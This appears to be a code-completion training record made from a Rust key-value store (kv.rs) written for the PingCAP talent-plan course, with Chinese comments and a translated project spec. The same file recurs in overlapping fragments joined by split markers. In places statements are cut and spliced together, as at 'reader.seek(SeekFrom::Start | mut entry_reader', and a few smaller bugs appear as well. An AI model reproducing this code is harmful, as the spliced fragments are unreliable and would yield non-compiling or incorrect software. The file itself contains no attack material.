// 通过 serde_json 可以实现“流”方式的贪婪匹配对象(反序列化)
let data = b"[10] [1] [2]";
let de = serde_json::Deserializer::from_slice(data);
let mut stream = de.into_iter::<Vec<i32>>();
dbg!(stream.byte_offset()); // 0
dbg!(stream.next()); // Some([10])
dbg!(stream.byte_offset()); // 4
dbg!(stream.next()); // Some([1])
dbg!(stream.byte_offset()); // 8
dbg!(stream.next()); // Some([2])
dbg!(stream.byte_offset()); // 12
}
#[test]
fn test_read_dir() {
let res = read_dir("./");
assert!(res.is_ok());
}
#[test]
fn test_create_dir() {
// 执行时,`./` 指的是项目根目录
let res = create_dir("./test-dir");
assert!(res.is_ok());
}
#[test]
fn test_new_log_file() {
let mut hs: HashMap<u64, BufReaderWithPos<File>> = HashMap::new();
let res = new_log_file(Path::new("./data"), 0, &mut hs);
dbg!(res);
}
#[test]
fn test_command_pos() {
// Into trait 的使用和了解
let c1: CommandPos = (1, 2..17).into();
dbg!(c1);
}
}
/*
>* 资料来源:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
### 部分 1:错误处理
在这个项目中,I/O 错误会导致代码执行失败。因此,在完全实现数据库之前,我们还需要确定一件
至关重要的事:错误处理策略。
Rust 的错误处理很强大,但需要以合适的方式使用多个样板文件,而对于这个项目,failure 库将提供便捷的错误处理工具。
failure 库的指南中描述了几种错误处理模式。
我们选择其中一种策略,然后在库中可以定义自己的错误类型,也可以导入其他 Error。这个策略对应的错误类型将会在项目中的 Result 中使用,
可以使用 `?` 操作符把其他库中的错误类型转换为自己库的错误类型。
这样,为 Result 定义一个含有错误类型的类型别名,编码时就不需要到处输入 Result<T, YourErrorType>,而可以简单的输入 Result。这是一种非常常见的 Rust 模式。
最后,使用 use 语句将这些类型导入到代码中,然后将 main 函数的签名的返回值部分修改为 `Result<()>`。
运行 `cargo check` 可以用编译器检查错误,然后修复这些错误。现在可以先使用 `panic!()` 来结束 `main` 函数,从而通过编译。
在前进之前,先确定好你的错误处理策略。
与之前的项目一样,你可以创建用于占位的数据结构和方法,以便跑通测试用例。现在你定义一个错误类型,这很简单。然后在所有需要编译测试用例的地方添加 panic(`cargo test --no-run`)。
注意:Rust 中的“错误处理”仍在发展和改进中。本课程目前使用 [`failure`](https://docs.rs/failure/0.1.5/failure/) 库定义错误类型更容易。虽然 `failure` 设计不错,但它的使用[不是最佳实践](https://github.com/rust-lang-nursery/rust-cookbook/issues/502#issue-387418261)。Rust 专家可能会开发出更好的错误处理方式。
在后面的课程中有可能不会一直使用 `failure`。于此同时,它也是一个不错的选择,它能用于学习 Rust 错误处理的演进以及优化。
### 部分 2:log 的作用和原理
现在我们终于要开始从磁盘读写来实现一个真正的数据库。我们将使用 [serde](https://serde.rs/) 来把 "set" 和 "rm" 指令序列化为字符串,然后用标准的文件 I/O 接口来写到硬盘上。
下面这些是 `kvs` 最基本的日志行文:
* "set"
* 用户调用 `kvs set mykey myvalue`
* `kvs` 创建 set 指令包含的值,其中有 key 和 value
* 然后,程序将指令序列化为 `String`
* 然后,把序列化的指令追加到日志文件中
* 如果成功了,则以错误码 0 静默地退出
* 如果失败了,就打印错误,并返回非 0 地错误代码并退出
* "get"
* 用户调用指令:`kvs get mykey`
* kvs 每次读取一条指令,将相应受影响的 key 和文件偏移量记录到内存的 map 中,即 key -> 日志指针
* 然后,检查 map 中的日志指针
* 如果失败,则打印“Key not found”,并以代码 0 退出
* 如果成功
* 它将指令日志反序列化得到最后的记录中的 key 和值
* 然后将结果打印到标准输出,并以代码 0 退出
* "rm"
* 用户调用指令 `kvs rm mykey`
* 和 get 指令一样,kvs 读取整条日志来在内存中构建索引
* 然后,它检查 map 中是否存在给定的 key
* 如果不存在,就返回“Key not found”
* 如果成功,将会创建对应的 rm 指令,其中包含了 key
* 然后将指令序列化后追加到日志中
* 如果成功,则以错误码 0 静默退出
日志是提交到数据库的事务记录。通过在启动时,“重建”(replaying)日志中的记录,我们就可以重现数据库在某个时间点的特定状态。
在这个迭代中,你可以将键的值直接存储在内存中(因此在重启或重建时是不会从日志中读取内容的)。在后面的迭代中,只需将日志指针(文件偏移量)存储到日志中。
### 部分 3:log 的写入
我们将从 set 开始。接下来将会有很多步骤。但大部分都比较容易实现,你可以通过运行 `cli_*` 相关测试用例来验证你的实现。
`serde` 是一个大型库,有许多功能选项,支持多种序列化格式。基本的序列化和反序列化只需要对结构体进行合适的注解,然后调用一个函数将序列化后的内容写入 `String` 或者 `Write` 流。
你需要选择一种序列化格式。并确定你需要的属性 —— 你是否需要性能优先?你希望以纯文本形式读取日志内容吗?这都在于你如何配置,但你记得在代码中写好注释。
还有其他因素要考虑一下:系统在哪设置缓冲,以及哪些地方需要?缓冲后续的影响是什么?何时打开和关闭文件句柄?有哪些支持的命令?`KvStore` 的生命周期是什么?
你调用的一些 api 可能会失败,并返回错误类型的 `Result`。你需要确保调用函数会返回你自己设定的错误类型的 `Result`,并用 `?` 向上传递。
类似于 rm 命令,我们希望在把命令写入日志之前,还要检查 key 是否存在。因为两种场景需要区分开,所以可以使用 enum 类型的变体来统一所有命令。`serde` 可以完美地与枚举一起使用。
你现在可以实现 set 和 rm 命令了,重点放在 set / rm 对应的测试用例上,也可以阅读下一节的 get 命令实现。记住这两个命令并加以实现,会对你很有帮助。选择权在你。
### 部分 4:log 的读取
现在该实现 get 了。在这一部分中,你不需要把日志指针存储在索引中,而将其放到下一节进行实现。这一节我们只需在启动时,读取日志中的所有命令,执行它们将每个键值对保存在内存中。然后根据需要从内存中读取。
应该一次性把日志内容全部读取到内存中并通过 map 类型来重现数据吗;需要在某个时候读取一条日志从而重现 map 中的某条数据吗?应该在序列化、反序列化之前将其从文件系统中读取到 buffer 中吗?想想你使用内存的方式。考虑一下与内核交互是否是从 I/O 流读取数据。
记住,"get" 可能获取不到值,这种情况下,需要特殊处理。这里,我们的 API 返回 `None`,然后客户端打印一个特定的消息,并以零代码退出。
读取日志有一个复杂点,你在编写 set 时,可能已经想到了:如何区分日志中的记录?也就是说,如何终止读取,何时开始读取下一条记录?需要这样实现吗?也许 serde 将直接从 I/O 流中序列化一条记录,并在操作完后停止读取,将游标停留在正确的位置,以便读取后续的记录。也许 serde 在检查到两条背靠背(back-to-back)的记录时会报错。也许你需要插入额外的信息来区分每个记录的长度,也有可能有其他方式。
_现在要实现 “get” 了_
### 部分 5:在索引中存储 log 的指针
此时,除压缩数据相关的测试以外,其他测试应该都是通过的。接下来的步骤是一些性能优化和存储优化。当你实现它们时,需要注意它们的意义是什么?
正如我们前面描述的那样,我们所实现的数据库是在内存中维护所有的 key 索引。这个索引映射到字符串指针(值内容),而非 key 本身的内容。
这个更改就需要我们可以从任意偏移量处读取日志。想一想,这将怎样影响我们对文件的处理。
如果在前面的步骤中,你选择将字符串直接存在内存中,那现在需要调整代码为存储日志指针的方式,并根据需要从磁盘中加载内容。
### 部分 6:KvStore 的有状态和无状态
请记住,我们的项目不仅是一个库,也可作为命令行程序。它们有些不一样:kvs 命令行程序向磁盘提交一个更改,然后就退出了(无状态);KvStore 会将更改提交到磁盘,然后常驻内存以服务后续的查询(有状态)。
你的 KvStore 是有状态还是无状态呢?
可以让你的 KvStore 的索引常驻内存中,这样就无需在每次调用时重新执行所有的日志指令。
### 部分 7:log 的压缩
到这里,数据库运行是正常的,但日志会无限增长。这对其他数据库可能没啥影响,但对于我们正在构建的数据库 —— 我们需要尽量减少磁盘的占用。
因此,最后一步就是压缩日志了。需要考虑到随着日志的增长,可能有多个指令日志对同一个键操作。还要考虑到,对于同一个键,只有最近一次的日志的更改才对其值有影响:
索引序号 | 指令
|:---- |:--- |
| 0 | ~~Command::Set("key-1", "value-1a")~~ |
| 20 | Command::Set("key-2", "value-2") |
| | ... |
| 100 | Command::Set("key-1", "value-1b") |
在这个例子中,索引 0 的日志很明显是冗余的,因此不需要对其存储。日志压缩其实就是重新构建日志并且消除冗余:
索引序号 | 指令
|:---- |:--- |
| 0 | Command::Set("key-2", "value-2") |
| | ... |
| 99 | Command::Set("key-1", "value-1b") |
这是基本的压缩算法的使用:
如何重建日志取决于你。考虑一下这个问题:最原始的方法是什么?需要多少内存?压缩日志所需的最小拷贝量是多少?能实时压缩吗?如果压缩失败,怎样保证数据完整性?
到目前为止,我们一直致力于“日志”的处理,但实际上,数据库的数据存储在多个日志文件中是很常见的。如果你将日志拆分到多个文件中,你可能会发现压缩日志更容易。
给数据库实现日志压缩。
恭喜!你已经编写了一个功能齐全的数据库了。
如果你很好奇,你可以将你实现的数据库的性能与其他数据库(如 sled、bitcask、badger 或 RicksDB)进行性能对比。你可能喜欢研究它们实现的架构,将其与你自己的架构对比,以及架构的不同对性能有何影响。接下来的几个项目将为你提供优化的机会。
写的很棒,朋友。可以休息一下了。
*/ | } else { | random_line_split |
kv.rs | //! 通过 [indexmap](https://github.com/bluss/indexmap) 实现简单的 KV 数据库
//! 为了防止 data race,将 IndexMap 用 Arc 进行包装
//! 具体实现可以参考:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/src/kv.rs
use super::util::HandyRwLock;
use crate::{KvsError, Result};
use indexmap::IndexMap;
use serde::{Deserialize, Serialize};
use serde_json::Deserializer;
use std::{
collections::{BTreeMap, HashMap},
ffi::OsStr,
fs::File,
io::{BufReader, BufWriter, Read, Seek, SeekFrom, Write},
ops::Range,
path::{Path, PathBuf},
sync::{Arc, RwLock},
};
/// 键值对存储在日志文件中 todo
struct KVStore {
/// 当将键设置为值时,kvs 将 set 命令写入硬盘中的有序日志中,
/// 然后将该日志对应的指针(文件偏移量)指向键和内容,并存储在内存索引中。
/// 类似地,当删除一个键时,kvs 将 rm 命令写入日志,然后从内存索引中删除该键。
/// 当使用 get 命令检索键的值时,它检索索引,如果找到了,就从对应的日志指针上加载命令,执行命令并返回结果。
///
/// kvs 启动时,就会按从旧到新的顺序从日志中遍历并执行命令,内存索引也会对应的重建。
///
/// 当日志条数达到给定阈值时,kvs 会其压缩为一个新日志,删除冗余日志以回收磁盘空间。
///
/// 注意,kvs 项目既是一个无状态命令行程序,也是一个包含有状态 KVStore 类型的库:
/// 对于 CLI,使用 KVStore 类型将加载索引,执行命令,然后退出;对于库使用,它将加载索引,然后执行多个命令,维护索引状态,直到它被删除。
/// ref: https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
path: PathBuf,
// 数字到文件的映射
readers: HashMap<u64, BufReaderWithPos<File>>,
// 当前用于写的日志文件
writer: BufWriterWithPos<File>,
// 存在内存中的索引
index: BTreeMap<String, CommandPos>,
// inner: Arc<RwLock<IndexMap<Vec<u8>, Vec<u8>>>>,
/// 记录当前所写入的文件标号
current_gen: u64,
/// 记录过期/无效的(可被删除的)值的字节数量
uncompacted: u64,
}
#[derive(Debug)]
struct BufWriterWithPos<W: Write + Seek> {
writer: BufWriter<W>,
pos: u64,
}
impl<W: Write + Seek> BufWriterWithPos<W> {
fn new(mut inner: W) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0));
Ok(BufWriterWithPos {
writer: BufWriter::new(inner),
pos: 0,
})
}
}
impl<W: Write + Seek> Write for BufWriterWithPos<W> {
fn write(&mut self, buf: &[u8]) -> std::io::Result<usize> {
let len = self.writer.write(buf)?;
self.pos += len as u64;
Ok(len)
}
fn flush(&mut self) -> std::io::Result<()> {
self.writer.flush()
}
}
struct BufReaderWithPos<R: Read + Seek> {
reader: BufReader<R>,
pos: u64,
}
impl<R: Read + Seek> BufReaderWithPos<R> {
fn new(mut inner: R) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0))?;
Ok(BufReaderWithPos {
reader: BufReader::new(inner),
pos,
})
}
}
// 将目录中的文件列表按名字进行排序,以便得到有序的日志文件列表
fn sorted_gen_list(path: PathBuf) -> Result<Vec<u64>> {
let mut gen_list: Vec<u64> = std::fs::read_dir(&path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file() && path.extension() == Some("log".as_ref()))
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.trim_end_matches(".log"))
.map(str::parse::<u64>)
})
.flatten()
.collect();
gen_list.sort_unstable();
Ok(gen_list)
}
fn log_path(dir: &Path, gen: u64) -> PathBuf {
dir.join(format!("{}.log", gen))
}
/// 通过文件序号,从对应的文件中读取指令并生成对应的索引加载到内存中(BTreeMap)
fn load(
gen: u64,
reader: &mut BufReaderWithPos<File>,
index: &mut BTreeMap<String, CommandPos>,
) -> Result<u64> {
// 确定从文件的某个位置开始读
let mut pos = reader.seek(SeekFrom::Start(0))?;
let mut stream = Deserializer::from_reader(reader).into_iter::<Command>();
// 通过压缩的手段可节省的字节数
let mut uncompacted = 0;
while let Some(cmd) = stream.next() {
// 匹配到下一条指令所对应的 offset
let new_pos = stream.byte_offset() as u64;
match cmd? {
Command::Set { key, .. } => {
if let Some(old_cmd) = index.insert(key, (gen, pos..new_pos).into()) {
uncompacted += old_cmd.len;
}
}
// 删除
Command::Remove { key } => {
if let Some(old_cmd) = index.remove(&key) {
uncompacted += old_cmd.len;
}
// 为何加上了指令的长度?todo
uncompacted += new_pos - pos;
}
}
pos = new_pos;
}
Ok(uncompacted)
}
#[derive(Debug, Deserialize, Serialize)]
enum Command {
Set { key: String, value: String },
Remove { key: String },
}
/// 定义支持的指令/日志
impl Command {
fn set(key: String, value: String) -> Self {
Command::Set { key, value }
}
fn remove(key: String) -> Self {
Command::Remove { key }
}
}
/// 命令位置
#[derive(Debug)]
struct CommandPos {
/// 日志文件序号
gen: u64,
/// 日志在一个文件中的偏移量
pos: u64,
/// 日志的长度。一个指令就算是一条日志
len: u64,
}
impl From<(u64, Range<u64>)> for CommandPos {
fn from((gen, range): (u64, Range<u64>)) -> Self {
CommandPos {
gen,
pos: range.start,
len: range.end - range.start,
}
}
}
impl<R: Seek + Read> Seek for BufReaderWithPos<R> {
fn seek(&mut self, pos: SeekFrom) -> std::io::Result<u64> {
self.pos = self.reader.seek(pos)?;
Ok(self.pos)
}
}
impl<R: Seek + Read> Read for BufReaderWithPos<R> {
fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
let len = self.reader.read(buf)?;
self.pos += len as u64;
Ok(len)
}
}
impl KVStore {
/// 基于一个路径启动一个 KvStore 实例。
/// 如果路径不存在,则创建
fn open(path: impl Into<PathBuf>) -> Result<Self> {
// 打开目录,查看目录中的日志文件列表,将其加载进 kvs
let using_path = path.into();
std::fs::create_dir_all(&using_path)?;
let mut readers = HashMap::new();
// 索引以 btree map 的形式存储在内存中
let mut index: BTreeMap<String, CommandPos> = BTreeMap::new();
let gen_list = sorted_gen_list(using_path.clone())?;
let mut uncompacted = 0;
for &gen in &gen_list {
let mut reader = BufReaderWithPos::new(File::open(log_path(&using_path, gen))?)?;
uncompacted += load(gen, &mut reader, &mut index)?;
readers.insert(gen, reader);
}
let current_gen = gen_list.last().unwrap_or(&0) + 1;
let writer = new_log_file(&using_path, current_gen, &mut readers)?;
Ok(KVStore {
path: using_path.clone(),
readers,
writer,
index,
current_gen,
uncompacted,
})
}
/// 设定键值对
/// 1.序列化指令,刷入文件中;2.索引写入内存
fn set(&mut self, k: String, v: String) -> Result<()> {
let cmd = Command::set(k, v);
let pos = self.writer.pos;
serde_json::to_writer(&mut self.writer, &cmd)?;
self.writer.flush()?;
// 索引写入内存 todo
if let Command::Set { key, .. } = cmd {
if let Some(old_cmd) = self
.index
.insert(key, (self.current_gen, pos..self.writer.pos).into())
{
self.uncompacted += old_cmd.len;
}
}
Ok(())
}
/// 读取值
/// 如果key存在则返回值,不存在,返回 None
fn get(&mut self, k: String) -> Result<Option<String>> {
if let Some(cmd_pos) = self.index.get(&k) {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("Cannot find log reader");
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
let cmd_reader = reader.take(cmd_pos.len);
if let Command::Set { value, .. } = serde_json::from_reader(cmd_reader)? {
Ok(Some(value))
} else {
Err(KvsError::UnsupportCmdType)
}
} else {
Ok(None)
}
}
/// 查询 key 是否存在,如果存在,则记录 cmd 到日志,然后删除文件中的数据,再索引索引
fn delete(&mut self, k: String) -> Result<()> {
if self.index.contains_key(&k) {
let rm_cmd = Command::remove(k.clone());
serde_json::to_writer(&mut self.writer, &rm_cmd)?;
self.writer.flush()?;
if let Command::Remove { key } = rm_cmd {
let old_cmd = self.index.remove(&key).expect("rm key error.");
self.uncompacted += old_cmd.len;
}
Ok(())
} else {
Err(KvsError::KeyNotFound)
}
}
/// 压缩过期的不必要的数据指令
fn compact(&mut self) -> Result<()> {
let compaction_gen = self.current_gen + 1;
self.current_gen += 2;
self.writer = self.new_log_file(self.current_gen)?;
let mut compaction_writer = self.new_log_file(compaction_gen)?;
let mut new_pos = 0;
for cmd_pos in &mut self.index.values_mut() {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("cann't find log reader");
if reader.pos != cmd_pos.pos {
reader.seek(SeekFrom::Start | mut entry_reader = reader.take(cmd_pos.len);
let len = std::io::copy(&mut entry_reader, &mut compaction_writer)?;
*cmd_pos = (compaction_gen, new_pos..new_pos + len).into();
new_pos += len;
}
compaction_writer.flush()?;
// 删除过期的日志文件
let stale_gens: Vec<_> = self
.readers
.keys()
.filter(|&&gen| gen < compaction_gen)
.cloned()
.collect();
for stale_gen in stale_gens {
self.readers.remove(&stale_gen);
std::fs::remove_file(log_path(&self.path, stale_gen))?;
}
self.uncompacted = 0;
Ok(())
}
fn new_log_file(&mut self, gen: u64) -> Result<BufWriterWithPos<File>> {
new_log_file(&self.path, gen, &mut self.readers)
}
}
// 读取一个目录下的文件
fn read_dir(path: &str) -> Result<Vec<String>> {
// Rust 实现浏览文件
let dirs: Vec<String> = std::fs::read_dir(path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file())
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.to_string())
})
.collect();
dbg!(&dirs);
Ok(dirs)
}
fn create_dir(path: &str) -> Result<bool> {
std::fs::create_dir_all(path)?;
Ok(true)
}
/// 日志文件的创建
fn new_log_file(
path: &Path,
gen: u64,
readers: &mut HashMap<u64, BufReaderWithPos<File>>,
) -> Result<BufWriterWithPos<File>> {
let path = log_path(&path, gen);
let writer = BufWriterWithPos::new(
std::fs::OpenOptions::new()
.create(true)
.write(true)
.append(true)
.open(&path)?,
)?;
readers.insert(gen, BufReaderWithPos::new(File::open(&path)?)?);
Ok(writer)
}
#[cfg(test)]
mod tests {
use std::{fmt::Result, str::FromStr};
use super::*;
#[test]
fn test_store1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".into();
st.set(cache_key.clone(), "hello org".to_string());
assert_eq!(st.get(cache_key.to_string()).unwrap(), Some("hello org".to_string()));
}
#[test]
fn test_load1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".to_string();
dbg!(st.get(cache_key.to_string()).unwrap());
}
#[test]
// fn test_store_delete() {
// let mut st = KVStore::new();
// let cache_key: Vec<u8> = "org_1001_info".as_bytes().into();
// st.set(cache_key.clone(), "hello org".as_bytes().into());
// assert_eq!(st.delete(&cache_key), Some("hello org".as_bytes().into()));
// assert_eq!(st.get(&cache_key), None);
// }
#[test]
fn test_sorted_gen_list() {
let res = sorted_gen_list(PathBuf::from("./"));
dbg!(&res);
}
#[test]
fn test_serde() {
// 通过 serde_json 可以实现“流”方式的贪婪匹配对象(反序列化)
let data = b"[10] [1] [2]";
let de = serde_json::Deserializer::from_slice(data);
let mut stream = de.into_iter::<Vec<i32>>();
dbg!(stream.byte_offset()); // 0
dbg!(stream.next()); // Some([10])
dbg!(stream.byte_offset()); // 4
dbg!(stream.next()); // Some([1])
dbg!(stream.byte_offset()); // 8
dbg!(stream.next()); // Some([2])
dbg!(stream.byte_offset()); // 12
}
#[test]
fn test_read_dir() {
let res = read_dir("./");
assert!(res.is_ok());
}
#[test]
fn test_create_dir() {
// 执行时,`./` 指的是项目根目录
let res = create_dir("./test-dir");
assert!(res.is_ok());
}
#[test]
fn test_new_log_file() {
let mut hs: HashMap<u64, BufReaderWithPos<File>> = HashMap::new();
let res = new_log_file(Path::new("./data"), 0, &mut hs);
dbg!(res);
}
#[test]
fn test_command_pos() {
// Into trait 的使用和了解
let c1: CommandPos = (1, 2..17).into();
dbg!(c1);
}
}
/*
>* 资料来源:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
### 部分 1:错误处理
在这个项目中,I/O 错误会导致代码执行失败。因此,在完全实现数据库之前,我们还需要确定一件
至关重要的事:错误处理策略。
Rust 的错误处理很强大,但需要以合适的方式使用多个样板文件,而对于这个项目,failure 库将提供便捷的错误处理工具。
failure 库的指南中描述了几种错误处理模式。
我们选择其中一种策略,然后在库中可以定义自己的错误类型,也可以导入其他 Error。这个策略对应的错误类型将会在项目中的 Result 中使用,
可以使用 `?` 操作符把其他库中的错误类型转换为自己库的错误类型。
这样,为 Result 定义一个含有错误类型的类型别名,编码时就不需要到处输入 Result<T, YourErrorType>,而可以简单的输入 Result。这是一种非常常见的 Rust 模式。
最后,使用 use 语句将这些类型导入到代码中,然后将 main 函数的签名的返回值部分修改为 `Result<()>`。
运行 `cargo check` 可以用编译器检查错误,然后修复这些错误。现在可以先使用 `panic!()` 来结束 `main` 函数,从而通过编译。
在前进之前,先确定好你的错误处理策略。
与之前的项目一样,你可以创建用于占位的数据结构和方法,以便跑通测试用例。现在你定义一个错误类型,这很简单。然后在所有需要编译测试用例的地方添加 panic(`cargo test --no-run`)。
注意:Rust 中的“错误处理”仍在发展和改进中。本课程目前使用 [`failure`](https://docs.rs/failure/0.1.5/failure/) 库定义错误类型更容易。虽然 `failure` 设计不错,但它的使用[不是最佳实践](https://github.com/rust-lang-nursery/rust-cookbook/issues/502#issue-387418261)。Rust 专家可能会开发出更好的错误处理方式。
在后面的课程中有可能不会一直使用 `failure`。于此同时,它也是一个不错的选择,它能用于学习 Rust 错误处理的演进以及优化。
### 部分 2:log 的作用和原理
现在我们终于要开始从磁盘读写来实现一个真正的数据库。我们将使用 [serde](https://serde.rs/) 来把 "set" 和 "rm" 指令序列化为字符串,然后用标准的文件 I/O 接口来写到硬盘上。
下面这些是 `kvs` 最基本的日志行文:
* "set"
* 用户调用 `kvs set mykey myvalue`
* `kvs` 创建 set 指令包含的值,其中有 key 和 value
* 然后,程序将指令序列化为 `String`
* 然后,把序列化的指令追加到日志文件中
* 如果成功了,则以错误码 0 静默地退出
* 如果失败了,就打印错误,并返回非 0 地错误代码并退出
* "get"
* 用户调用指令:`kvs get mykey`
* kvs 每次读取一条指令,将相应受影响的 key 和文件偏移量记录到内存的 map 中,即 key -> 日志指针
* 然后,检查 map 中的日志指针
* 如果失败,则打印“Key not found”,并以代码 0 退出
* 如果成功
* 它将指令日志反序列化得到最后的记录中的 key 和值
* 然后将结果打印到标准输出,并以代码 0 退出
* "rm"
* 用户调用指令 `kvs rm mykey`
* 和 get 指令一样,kvs 读取整条日志来在内存中构建索引
* 然后,它检查 map 中是否存在给定的 key
* 如果不存在,就返回“Key not found”
* 如果成功,将会创建对应的 rm 指令,其中包含了 key
* 然后将指令序列化后追加到日志中
* 如果成功,则以错误码 0 静默退出
日志是提交到数据库的事务记录。通过在启动时,“重建”(replaying)日志中的记录,我们就可以重现数据库在某个时间点的特定状态。
在这个迭代中,你可以将键的值直接存储在内存中(因此在重启或重建时是不会从日志中读取内容的)。在后面的迭代中,只需将日志指针(文件偏移量)存储到日志中。
### 部分 3:log 的写入
我们将从 set 开始。接下来将会有很多步骤。但大部分都比较容易实现,你可以通过运行 `cli_*` 相关测试用例来验证你的实现。
`serde` 是一个大型库,有许多功能选项,支持多种序列化格式。基本的序列化和反序列化只需要对结构体进行合适的注解,然后调用一个函数将序列化后的内容写入 `String` 或者 `Write` 流。
你需要选择一种序列化格式。并确定你需要的属性 —— 你是否需要性能优先?你希望以纯文本形式读取日志内容吗?这都在于你如何配置,但你记得在代码中写好注释。
还有其他因素要考虑一下:系统在哪设置缓冲,以及哪些地方需要?缓冲后续的影响是什么?何时打开和关闭文件句柄?有哪些支持的命令?`KvStore` 的生命周期是什么?
你调用的一些 api 可能会失败,并返回错误类型的 `Result`。你需要确保调用函数会返回你自己设定的错误类型的 `Result`,并用 `?` 向上传递。
类似于 rm 命令,我们希望在把命令写入日志之前,还要检查 key 是否存在。因为两种场景需要区分开,所以可以使用 enum 类型的变体来统一所有命令。`serde` 可以完美地与枚举一起使用。
你现在可以实现 set 和 rm 命令了,重点放在 set / rm 对应的测试用例上,也可以阅读下一节的 get 命令实现。记住这两个命令并加以实现,会对你很有帮助。选择权在你。
### 部分 4:log 的读取
现在该实现 get 了。在这一部分中,你不需要把日志指针存储在索引中,而将其放到下一节进行实现。这一节我们只需在启动时,读取日志中的所有命令,执行它们将每个键值对保存在内存中。然后根据需要从内存中读取。
应该一次性把日志内容全部读取到内存中并通过 map 类型来重现数据吗;需要在某个时候读取一条日志从而重现 map 中的某条数据吗?应该在序列化、反序列化之前将其从文件系统中读取到 buffer 中吗?想想你使用内存的方式。考虑一下与内核交互是否是从 I/O 流读取数据。
记住,"get" 可能获取不到值,这种情况下,需要特殊处理。这里,我们的 API 返回 `None`,然后客户端打印一个特定的消息,并以零代码退出。
读取日志有一个复杂点,你在编写 set 时,可能已经想到了:如何区分日志中的记录?也就是说,如何终止读取,何时开始读取下一条记录?需要这样实现吗?也许 serde 将直接从 I/O 流中序列化一条记录,并在操作完后停止读取,将游标停留在正确的位置,以便读取后续的记录。也许 serde 在检查到两条背靠背(back-to-back)的记录时会报错。也许你需要插入额外的信息来区分每个记录的长度,也有可能有其他方式。
_现在要实现 “get” 了_
### 部分 5:在索引中存储 log 的指针
此时,除压缩数据相关的测试以外,其他测试应该都是通过的。接下来的步骤是一些性能优化和存储优化。当你实现它们时,需要注意它们的意义是什么?
正如我们前面描述的那样,我们所实现的数据库是在内存中维护所有的 key 索引。这个索引映射到字符串指针(值内容),而非 key 本身的内容。
这个更改就需要我们可以从任意偏移量处读取日志。想一想,这将怎样影响我们对文件的处理。
如果在前面的步骤中,你选择将字符串直接存在内存中,那现在需要调整代码为存储日志指针的方式,并根据需要从磁盘中加载内容。
### 部分 6:KvStore 的有状态和无状态
请记住,我们的项目不仅是一个库,也可作为命令行程序。它们有些不一样:kvs 命令行程序向磁盘提交一个更改,然后就退出了(无状态);KvStore 会将更改提交到磁盘,然后常驻内存以服务后续的查询(有状态)。
你的 KvStore 是有状态还是无状态呢?
可以让你的 KvStore 的索引常驻内存中,这样就无需在每次调用时重新执行所有的日志指令。
### 部分 7:log 的压缩
到这里,数据库运行是正常的,但日志会无限增长。这对其他数据库可能没啥影响,但对于我们正在构建的数据库 —— 我们需要尽量减少磁盘的占用。
因此,最后一步就是压缩日志了。需要考虑到随着日志的增长,可能有多个指令日志对同一个键操作。还要考虑到,对于同一个键,只有最近一次的日志的更改才对其值有影响:
索引序号 | 指令
|:---- |:--- |
| 0 | ~~Command::Set("key-1", "value-1a")~~ |
| 20 | Command::Set("key-2", "value-2") |
| | ... |
| 100 | Command::Set("key-1", "value-1b") |
在这个例子中,索引 0 的日志很明显是冗余的,因此不需要对其存储。日志压缩其实就是重新构建日志并且消除冗余:
索引序号 | 指令
|:---- |:--- |
| 0 | Command::Set("key-2", "value-2") |
| | ... |
| 99 | Command::Set("key-1", "value-1b") |
这是基本的压缩算法的使用:
如何重建日志取决于你。考虑一下这个问题:最原始的方法是什么?需要多少内存?压缩日志所需的最小拷贝量是多少?能实时压缩吗?如果压缩失败,怎样保证数据完整性?
到目前为止,我们一直致力于“日志”的处理,但实际上,数据库的数据存储在多个日志文件中是很常见的。如果你将日志拆分到多个文件中,你可能会发现压缩日志更容易。
给数据库实现日志压缩。
恭喜!你已经编写了一个功能齐全的数据库了。
如果你很好奇,你可以将你实现的数据库的性能与其他数据库(如 sled、bitcask、badger 或 RicksDB)进行性能对比。你可能喜欢研究它们实现的架构,将其与你自己的架构对比,以及架构的不同对性能有何影响。接下来的几个项目将为你提供优化的机会。
写的很棒,朋友。可以休息一下了。
*/
| (cmd_pos.pos))?;
}
let | conditional_block |
kv.rs | //! 通过 [indexmap](https://github.com/bluss/indexmap) 实现简单的 KV 数据库
//! 为了防止 data race,将 IndexMap 用 Arc 进行包装
//! 具体实现可以参考:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/src/kv.rs
use super::util::HandyRwLock;
use crate::{KvsError, Result};
use indexmap::IndexMap;
use serde::{Deserialize, Serialize};
use serde_json::Deserializer;
use std::{
collections::{BTreeMap, HashMap},
ffi::OsStr,
fs::File,
io::{BufReader, BufWriter, Read, Seek, SeekFrom, Write},
ops::Range,
path::{Path, PathBuf},
sync::{Arc, RwLock},
};
/// 键值对存储在日志文件中 todo
struct KVStore {
/// 当将键设置为值时,kvs 将 set 命令写入硬盘中的有序日志中,
/// 然后将该日志对应的指针(文件偏移量)指向键和内容,并存储在内存索引中。
/// 类似地,当删除一个键时,kvs 将 rm 命令写入日志,然后从内存索引中删除该键。
/// 当使用 get 命令检索键的值时,它检索索引,如果找到了,就从对应的日志指针上加载命令,执行命令并返回结果。
///
/// kvs 启动时,就会按从旧到新的顺序从日志中遍历并执行命令,内存索引也会对应的重建。
///
/// 当日志条数达到给定阈值时,kvs 会其压缩为一个新日志,删除冗余日志以回收磁盘空间。
///
/// 注意,kvs 项目既是一个无状态命令行程序,也是一个包含有状态 KVStore 类型的库:
/// 对于 CLI,使用 KVStore 类型将加载索引,执行命令,然后退出;对于库使用,它将加载索引,然后执行多个命令,维护索引状态,直到它被删除。
